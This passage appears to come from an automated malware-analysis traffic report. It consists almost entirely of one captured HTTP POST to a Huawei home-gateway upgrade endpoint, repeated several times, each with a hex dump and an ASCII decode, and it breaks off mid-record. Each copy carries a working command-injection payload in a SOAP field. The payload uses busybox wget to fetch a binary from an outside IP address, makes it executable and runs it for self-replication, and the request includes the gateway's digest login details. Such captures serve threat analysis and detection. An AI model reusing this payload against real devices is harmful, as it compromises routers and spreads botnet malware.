43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 